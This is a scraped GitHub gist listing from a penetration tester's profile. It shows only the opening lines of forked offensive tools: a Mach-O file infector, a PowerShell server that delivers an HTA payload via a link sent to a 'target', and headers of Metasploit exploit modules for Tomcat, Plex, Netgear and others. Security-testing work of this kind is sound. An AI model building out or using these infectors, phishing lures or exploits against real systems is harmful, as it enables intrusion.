Skip to content

Instantly share code, notes, and snippets.

View carnal0wnage's full-sized avatar

Chris Gates carnal0wnage

949 followers · 129 following
View GitHub Profile
@carnal0wnage
carnal0wnage / osx_infector.py
Last active March 28, 2016 19:11 — forked from secretsquirrel/osx_infector.py
import os
import struct
import shutil
import subprocess
class macho_intel32_shellcode():
"""
Mach-O Intel x32 shellcode class
"""
@carnal0wnage
carnal0wnage / gist:457a3248ea36cfffc6c9
Last active August 2, 2016 22:00
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
function Receive-Request {
param(
$Request
)
$output = ""
@carnal0wnage
carnal0wnage / tomcat_mce_upload.rb
Last active August 29, 2015 14:06 — forked from infoslack/tomcat_mce_upload.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@carnal0wnage
carnal0wnage / simatic_wincc_harvester.rb
Last active August 29, 2015 14:06 — forked from atimorin/simatic_wincc_harvester.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
@carnal0wnage
carnal0wnage / shellinabox.rb
Last active August 29, 2015 14:06 — forked from bcoles/shellinabox.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
@carnal0wnage
carnal0wnage / nettemp_cmd_exec.rb
Last active August 29, 2015 14:06 — forked from bcoles/nettemp_cmd_exec.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@carnal0wnage
carnal0wnage / zenoss_graph_pt.rb
Last active August 29, 2015 14:06 — forked from zeroSteiner/zenoss_graph_pt.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@carnal0wnage
carnal0wnage / plex_windows_rce.rb
Last active August 29, 2015 14:06 — forked from phikshun/plex_windows_rce.rb
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Plex Code Execution Vulnerability',
@carnal0wnage
carnal0wnage / homeseer_code_execution.rb
Last active August 29, 2015 14:06 — forked from phikshun/homeseer_code_execution.rb
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HomeSeer Code Execution Vulnerability',
@carnal0wnage
carnal0wnage / netgear_telnet_enabler.rb
Last active August 29, 2015 14:06 — forked from phikshun/netgear_telnet_enabler.rb
require 'msf/core'
require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
# add gem 'crypt', '1.1.4' to Gemfile
module ::Crypt
class Blowfish
def setup_blowfish()
@sBoxes = Array.new(4) { |i| INITIALSBOXES[i].clone }
@pArray = INITIALPARRAY.clone
keypos = 0